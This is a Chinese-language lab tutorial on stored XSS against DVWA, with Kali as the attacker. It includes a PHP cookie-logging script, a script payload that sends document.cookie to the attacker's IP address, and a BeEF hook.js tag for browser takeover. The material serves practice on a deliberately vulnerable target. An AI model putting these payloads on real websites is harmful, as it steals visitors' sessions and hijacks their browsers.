为了让实验效果更好一点,这里除了使用靶机(win2008的DVWA)之外,还要使用kali来做进攻者,来收集战果(cookie)
准备工作(手工搭建环境)
1:首先在你的kali上安装web服务
(如果你的web服务无法正常启用,也可以试试升级它)
sudo apt install apache2
2:启动web服务
systemctl start apache2.service
3:确认apache2是运行状态
systemctl status apache2.service
4:准备一个文件来接收cookie
sudo vim /var/www/html/cookie_rec.php
内容如下:
<?php
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
5:给目录权限,一会让它生成存放cookie的文件
sudo chown -R www-data.www-data /var/www/
6:渗透
<script>window.open('http://192.168.40.129/cookie_rec.php?cookie='+document.cookie)</script>
注:192.168.40.129是kali的ip
如果前面做了存储型XSS,请删干净,或者直接重置DVWA
7:解除长度限制,默认限制长度为50个字符
你可以现在kali上测试一下,正常情况下浏览器会出一个空白的新页面,这个时候你会发现/var/www/html目录下多了个cookie.txt,里面会记录你的cookie。确认这一点之后记得恢复环境!!!
(由于我测试了多次,所以cookie记录里面有三条记录)
渗透
1:在DVWA上植入XSS代码的时候,排个雷,实验没有效果的话,换个浏览器试试,这个跟浏览器的安全策略有关
我kali的火狐浏览器会出现一个弹窗并被拦截,放过那个弹窗即可 √
我物理机的火狐浏览器输入XSS代码时,无任何反应 ×
我物理机的Edge浏览器输入XSS代码时,直接弹到一个新的标签页 √
2:检查是否收到cookie
准备工作BeEF
记得重置DVWA的环境
启动apache和BeEF
systemctl start apache2.service
点一下BeEF图标启动BeEF
访问BeEF的web页面
http://192.168.40.129:3000/ui/panel
使用XSS
去靶机上填入BeEF自动生成的一个XSS代码
<script src="http://192.168.40.129:3000/hook.js"></script>
植入木马
考虑到前面使用火狐浏览器不大顺利,这次使用Edge
收到结果
扩大战果
因为这是存储型XSS,所以任何人访问DVWA的这个页面都会中招,那么这里就用kali去访问一下页面,只需要kali访问这个页面即可。
BeEF拿到战果,甚至显示出了kali的虚拟机标识,够智能
192.168.40.131表示它是万恶之源,我们拿到的战果都是因为它(131是DVWA的主机IP)
Edge是谷歌的开源 Chromium 内核重构浏览器
192.168.40.1是VM8网卡的IP
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134369.html